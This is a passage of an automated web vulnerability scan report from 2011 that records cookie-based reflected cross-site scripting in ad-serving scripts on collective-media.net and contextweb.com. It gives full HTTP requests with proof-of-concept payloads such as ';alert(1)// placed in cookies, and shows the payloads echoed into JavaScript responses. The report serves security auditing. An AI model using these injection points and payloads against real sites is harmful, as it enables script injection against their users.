GET /cmadj/cm.dailymail/ron_052010;sz=300x250;net=cm;ord=3412338;ord1=572356;cmpgurl=http%253A//www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3764c2"%3balert(1)//cda0fdaa892; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:35:26 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Tue, 15-Feb-2011 01:35:26 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Tue, 15-Feb-2011 01:35:26 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Mon, 14-Feb-2011 09:35:26 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 15-Feb-2011 01:35:26 GMT
Content-Length: 8103

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
</scr'+'ipt>');CollectiveMedia.addPixel("http://ib.adnxs.com/mapuid?member=311&user=11d765b6a10b1b3764c2";alert(1)//cda0fdaa892&seg_code=noseg&ord=1297647326",true);CollectiveMedia.addPixel("http://pixel.quantserve.com/pixel/p-86ZJnSph3DaTI.gif",false);CollectiveMedia.addPixel("http://tags.bluekai.com/site/2731",false);Collect
...[SNIP]...

1.503. http://tag.contextweb.com/TAGPUBLISH/getad.aspx [V cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TAGPUBLISH/getad.aspx

Issue detail

The value of the V cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9370'%3balert(1)//736866c8cde was submitted in the V cookie. This input was echoed as c9370';alert(1)//736866c8cde in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /TAGPUBLISH/getad.aspx?tagver=1&ca=VIEWAD&cp=526735&ct=80710&cf=300X250&cn=1&rq=1&dw=1112&cwu=http%3A%2F%2Fblogs.desmoinesregister.com%2Fdmr%2Findex.php%2F2011%2F02%2F11%2Fdaniels-at-cpac-calls-for-broad-civil-conservative-coalition%2F&mrnd=65940194&if=0&tl=1&pxy=0,0&cxy=1096,3334&dxy=1096,3334&tz=360&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=292|1|-8589035730497595512|1; V=gFEcJzqCjXJjc9370'%3balert(1)//736866c8cde; cwbh1=2709%3B03%2F15%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F06%2F2011%3BFOCI1%0A749%3B02%2F19%2F2011%3BDOTM2%0A2532%3B03%2F15%2F2011%3BAMQU1; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB30
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2654
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 14 Feb 2011 01:36:57 GMT
Connection: close
Set-Cookie: V=gFEcJzqCjXJjc9370'%3balert(1)//736866c8cde; domain=.contextweb.com; expires=Tue, 14-Feb-2012 01:36:57 GMT; path=/
Set-Cookie: 526735_300X250_80710=2/13/2011 8:36:57 PM; domain=.contextweb.com; path=/
Set-Cookie: cr=292|1|-8589035730497595512|1%0a58|1|-8589033546683363385|1; domain=.contextweb.com; expires=Thu, 09-Feb-2012 01:36:57 GMT; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Mon, 14-Feb-2011 05:00:00 GMT; path=/

var strCreative=''
+ '<script language="JavaScript" type="text/javascript">\n'
+ 'document.write(\'<script language="JavaScript" src="http://optimized-by.rubiconproject.com/a/dk.js?defaulting_ad=x3
...[SNIP]...
<IFRAME SRC="http://aperture.displaymarketplace.com/audmeasure.gif?liveconclientID=3706557521217&CreativeID=&PlacementID=68&EventType=Impression&PixelID=100&rand=1394027073&cuID=gFEcJzqCjXJjc9370';alert(1)//736866c8cde&eventGuid=eloDgANSEiOf"HEIGHT="0" WIDTH="0" MARGINWIDTH="0" MARGINHEIGHT="0" ALLOWTRANSPARENCY="true" FRAMEBORDER="0" SCROLLING="NO">
...[SNIP]...

1.504. http://tag.contextweb.com/TAGPUBLISH/getad.aspx [cwbh1 cookie] previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TAGPUBLISH/getad.aspx

Issue detail

The value of the cwbh1 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d120'-alert(1)-'2f4c41a9c0d was submitted in the cwbh1 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /TAGPUBLISH/getad.aspx?tagver=1&ca=VIEWAD&cp=526735&ct=80710&cf=300X250&cn=1&rq=1&dw=1112&cwu=http%3A%2F%2Fblogs.desmoinesregister.com%2Fdmr%2Findex.php%2F2011%2F02%2F11%2Fdaniels-at-cpac-calls-for-broad-civil-conservative-coalition%2F&mrnd=65940194&if=0&tl=1&pxy=0,0&cxy=1096,3334&dxy=1096,3334&tz=360&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=292|1|-8589035730497595512|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F15%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F06%2F2011%3BFOCI1%0A749%3B02%2F19%2F2011%3BDOTM2%0A2532%3B03%2F15%2F2011%3BAMQU16d120'-alert(1)-'2f4c41a9c0d; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB25
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2658
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 14 Feb 2011 01:36:58 GMT
Connection: close
Set-Cookie: V=gFEcJzqCjXJj; domain=.contextweb.com; expires=Tue, 14-Feb-2012 01:36:58 GMT; path=/
Set-Cookie: 526735_300X250_80710=2/13/2011 8:36:58 PM; domain=.contextweb.com; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Mon, 14-Feb-2011 05:00:00 GMT; path=/

var strCreative=''
+ '<script language="JavaScript" type="text/javascript">\n'
+ 'document.write(\'<script language="JavaScript" src="http://optimized-by.rubiconproject.com/a/dk.js?defaulting_ad=x3
...[SNIP]...
<IFRAME SRC="http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif?tags=CONTEXTWEB.,526735,1518,749,,TOT09,RCQU1,RCQU9,FOCI1,DOTM2,AMQU16d120'-alert(1)-'2f4c41a9c0d,300X250" HEIGHT="0" WIDTH="0" MARGINWIDTH="0" MARGINHEIGHT="0" ALLOWTRANSPARENCY="true" FRAMEBORDER="0" SCROLLING="NO">
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Mon Feb 14 08:58:26 CST 2011.